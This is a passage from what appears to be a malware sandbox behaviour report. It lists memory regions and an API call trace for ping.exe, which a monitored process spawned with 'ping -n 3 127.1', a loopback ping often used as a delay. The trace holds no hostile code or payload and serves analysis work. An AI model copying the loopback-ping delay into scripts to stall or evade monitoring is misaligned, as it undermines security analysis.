Region: id = 5360 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5361 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5362 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5363 start_va = 0x7f410000 end_va = 0x7f50ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f410000" filename = "" Thread: id = 291 os_tid = 0x914 Process: id = "105" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x653ce000" os_pid = "0x12c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5430 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 5431 start_va = 0xd50000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 5432 start_va = 0xd70000 end_va = 0xd71fff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 5433 start_va = 0xd80000 end_va = 0xd8efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 5434 start_va = 0xd90000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 5435 start_va = 0xdd0000 end_va = 0xe0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 5436 start_va = 0xe10000 end_va = 0xe13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e10000" filename = "" Region: id = 5437 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 5438 start_va = 0xe30000 end_va = 0xe31fff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 5439 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5440 start_va = 0x7ee40000 end_va = 0x7ee62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee40000" filename = "" Region: id = 5441 start_va = 0x7ee64000 end_va = 0x7ee64fff entry_point = 0x0 region_type = private name = "private_0x000000007ee64000" filename = "" Region: id = 5442 start_va = 0x7ee6c000 end_va = 0x7ee6efff entry_point = 0x0 region_type = private name = "private_0x000000007ee6c000" filename = "" Region: id = 5443 start_va = 0x7ee6f000 end_va = 0x7ee6ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee6f000" filename = "" Region: id = 5444 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5445 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5446 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5447 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5448 start_va = 0xf80000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f80000" filename = "" Region: id = 5449 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5450 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5451 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5452 start_va = 0xd50000 end_va = 0xd5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 5453 start_va = 0xd60000 end_va = 0xd63fff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 5454 start_va = 0xe40000 end_va = 0xebdfff entry_point = 0xe40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5455 start_va = 0x1050000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 5456 start_va = 0x12e0000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 5457 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5458 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5459 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5460 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5461 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5462 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5463 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5464 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5465 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5466 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5467 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5468 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5469 start_va = 0x7ed40000 end_va = 0x7ee3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ed40000" filename = "" Region: id = 5470 start_va = 0xec0000 end_va = 0xefffff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 5471 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 5472 start_va = 0x7ee69000 end_va = 0x7ee6bfff entry_point = 0x0 region_type = private name = "private_0x000000007ee69000" filename = "" Region: id = 5473 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 5474 start_va = 0xd70000 end_va = 0xd72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 5475 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 5476 start_va = 0xf50000 end_va = 0xf52fff entry_point = 0xf50000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 5477 start_va = 0xf90000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 5478 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 5479 start_va = 0x7ee66000 end_va = 0x7ee68fff entry_point = 0x0 region_type = private name = "private_0x000000007ee66000" filename = "" Thread: id = 295 os_tid = 0x168 [0107.184] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0107.184] __set_app_type (_Type=0x1) [0107.184] __p__fmode () returned 0x76ea1768 [0107.184] __p__commode () returned 0x76ea176c [0107.184] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0107.184] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0107.184] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.186] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.186] _fileno (_File=0x76ea4c28) returned 1 [0107.186] _get_osfhandle (_FileHandle=1) returned 0x28 [0107.186] GetFileType (hFile=0x28) returned 0x2 [0107.186] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f340 | out: lpMode=0xe0f340) returned 0 [0107.186] GetLastError () returned 0x6 [0107.186] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f2a4, nSize=0x50 | out: lpBuffer="䤐ą") returned 0x0 [0107.186] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0107.188] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xe0f35c | out: phkResult=0xe0f35c*=0x88) returned 0x0 [0107.188] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xe0f350, lpData=0xe0f358, lpcbData=0xe0f354*=0x4 | out: lpType=0xe0f350*=0x0, lpData=0xe0f358*=0x0, lpcbData=0xe0f354*=0x4) returned 0x2 [0107.188] RegCloseKey (hKey=0x88) returned 0x0 [0107.188] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xe0f320*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xe0f35c | out: ppResult=0xe0f35c*=0x105c458*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x10589b8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0107.188] FreeAddrInfoW (pAddrInfo=0x105c458*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x10589b8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0107.188] IcmpCreateFile () returned 0x1056d08 [0107.191] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x105c188 [0107.191] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x1065270 [0107.191] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xe0f458, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0107.192] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="竈Ćﴤà┗\x94䰨盪❋") returned 0x14 [0107.193] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.193] _fileno (_File=0x76ea4c28) returned 1 [0107.193] _get_osfhandle (_FileHandle=1) returned 0x28 [0107.193] GetFileType (hFile=0x28) returned 0x2 [0107.193] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0107.193] GetLastError () returned 0x6 [0107.193] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à❋") returned 0x0 [0107.193] _fileno (_File=0x76ea4c28) returned 1 [0107.193] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0107.193] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0107.193] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x1067b00 [0107.193] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x1067b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0107.193] _fileno (_File=0x76ea4c28) returned 1 [0107.193] _write (in: _FileHandle=1, _Buf=0x1067b00*, _MaxCharCount=0x14 | out: _Buf=0x1067b00*) returned 20 [0107.193] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.193] _fileno (_File=0x76ea4c28) returned 1 [0107.193] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0107.193] LocalFree (hMem=0x1067b00) returned 0x0 [0107.193] LocalFree (hMem=0x1067ac8) returned 0x0 [0107.193] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="竈Ćﴤà▪\x94䰨盪❚") returned 0x18 [0107.193] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.193] _fileno (_File=0x76ea4c28) returned 1 [0107.193] _get_osfhandle (_FileHandle=1) returned 0x28 [0107.193] GetFileType (hFile=0x28) returned 0x2 [0107.193] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0107.193] GetLastError () returned 0x6 [0107.193] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à❚") returned 0x0 [0107.193] _fileno (_File=0x76ea4c28) returned 1 [0107.193] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0107.193] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0107.193] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x105c340 [0107.194] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x105c340, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0107.194] _fileno (_File=0x76ea4c28) returned 1 [0107.194] _write (in: _FileHandle=1, _Buf=0x105c340*, _MaxCharCount=0x18 | out: _Buf=0x105c340*) returned 24 [0107.194] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.194] _fileno (_File=0x76ea4c28) returned 1 [0107.194] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0107.194] LocalFree (hMem=0x105c340) returned 0x0 [0107.194] LocalFree (hMem=0x1067ac8) returned 0x0 [0107.194] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0107.194] IcmpSendEcho2Ex (in: IcmpHandle=0x1056d08, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x105c188, RequestSize=0x20, RequestOptions=0xe0f3cc, ReplyBuffer=0x1065270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1065270) returned 0x1 [0107.195] InetNtopW (in: Family=2, pAddr=0xe0f3bc, pStringBuf=0xe0f4e4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0107.195] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="笈Ćﴤà⛔\x94䰨盪✣") returned 0x16 [0107.195] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.195] _fileno (_File=0x76ea4c28) returned 1 [0107.195] _get_osfhandle (_FileHandle=1) returned 0x28 [0107.195] GetFileType (hFile=0x28) returned 0x2 [0107.195] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0107.195] GetLastError () returned 0x6 [0107.195] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à✣") returned 0x0 [0107.195] _fileno (_File=0x76ea4c28) returned 1 [0107.195] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0107.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0107.195] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x1067b40 [0107.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x1067b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0107.195] _fileno (_File=0x76ea4c28) returned 1 [0107.195] _write (in: _FileHandle=1, _Buf=0x1067b40*, _MaxCharCount=0x16 | out: _Buf=0x1067b40*) returned 22 [0107.195] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.195] _fileno (_File=0x76ea4c28) returned 1 [0107.195] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0107.195] LocalFree (hMem=0x1067b40) returned 0x0 [0107.195] LocalFree (hMem=0x1067b08) returned 0x0 [0107.195] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="笈Ćﴤà⛿\x94䰨盪✼") returned 0x9 [0107.195] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.195] _fileno (_File=0x76ea4c28) returned 1 [0107.195] _get_osfhandle (_FileHandle=1) returned 0x28 [0107.195] GetFileType (hFile=0x28) returned 0x2 [0107.195] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0107.195] GetLastError () returned 0x6 [0107.195] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à✼") returned 0x0 [0107.195] _fileno (_File=0x76ea4c28) returned 1 [0107.195] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0107.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0107.195] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1058910 [0107.195] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x1058910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0107.195] _fileno (_File=0x76ea4c28) returned 1 [0107.195] _write (in: _FileHandle=1, _Buf=0x1058910*, _MaxCharCount=0x9 | out: _Buf=0x1058910*) returned 9 [0107.195] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.195] _fileno (_File=0x76ea4c28) returned 1 [0107.195] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0107.195] LocalFree (hMem=0x1058910) returned 0x0 [0107.195] LocalFree (hMem=0x1067b08) returned 0x0 [0107.195] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xe0f354, nSize=0x0, Arguments=0xe0f350 | out: lpBuffer="笈Ćﴤà➷\x94䰨盪✧") returned 0x9 [0107.195] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.195] _fileno (_File=0x76ea4c28) returned 1 [0107.195] _get_osfhandle (_FileHandle=1) returned 0x28 [0107.195] GetFileType (hFile=0x28) returned 0x2 [0107.196] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f318 | out: lpMode=0xe0f318) returned 0 [0107.196] GetLastError () returned 0x6 [0107.196] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f27c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0107.196] _fileno (_File=0x76ea4c28) returned 1 [0107.196] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0107.196] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0107.196] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1058910 [0107.196] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x1058910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0107.196] _fileno (_File=0x76ea4c28) returned 1 [0107.196] _write (in: _FileHandle=1, _Buf=0x1058910*, _MaxCharCount=0x9 | out: _Buf=0x1058910*) returned 9 [0107.196] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.196] _fileno (_File=0x76ea4c28) returned 1 [0107.196] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0107.196] LocalFree (hMem=0x1058910) returned 0x0 [0107.196] LocalFree (hMem=0x1067b08) returned 0x0 [0107.196] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="笈Ćﴤà⟘\x94䰨盪✨") returned 0x9 [0107.196] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.196] _fileno (_File=0x76ea4c28) returned 1 [0107.196] _get_osfhandle (_FileHandle=1) returned 0x28 [0107.196] GetFileType (hFile=0x28) returned 0x2 [0107.196] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0107.196] GetLastError () returned 0x6 [0107.196] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: lpBuffer="à✨") returned 0x0 [0107.196] _fileno (_File=0x76ea4c28) returned 1 [0107.196] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0107.196] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0107.196] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1058910 [0107.196] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1058910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0107.196] _fileno (_File=0x76ea4c28) returned 1 [0107.196] _write (in: _FileHandle=1, _Buf=0x1058910*, _MaxCharCount=0x9 | out: _Buf=0x1058910*) returned 9 [0107.196] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0107.196] _fileno (_File=0x76ea4c28) returned 1 [0107.196] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0107.196] LocalFree (hMem=0x1058910) returned 0x0 [0107.196] LocalFree (hMem=0x1067b08) returned 0x0 [0107.196] Sleep (dwMilliseconds=0x3e8) [0108.208] IcmpSendEcho2Ex (in: IcmpHandle=0x1056d08, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0x105c188, RequestSize=0x20, RequestOptions=0xe0f3cc, ReplyBuffer=0x1065270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x1065270) returned 0x1 [0108.209] InetNtopW (in: Family=2, pAddr=0xe0f3bc, pStringBuf=0xe0f4e4, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0108.209] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xe0f350, nSize=0x0, Arguments=0xe0f34c | out: lpBuffer="羠Ćﴤà⛔\x94䰨盪✣") returned 0x16 [0108.209] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0108.209] _fileno (_File=0x76ea4c28) returned 1 [0108.209] _get_osfhandle (_FileHandle=1) returned 0x28 [0108.209] GetFileType (hFile=0x28) returned 0x2 [0108.209] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xe0f314 | out: lpMode=0xe0f314) returned 0 [0108.209] GetLastError () returned 0x6 [0108.209] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xe0f278, nSize=0x50 | out: 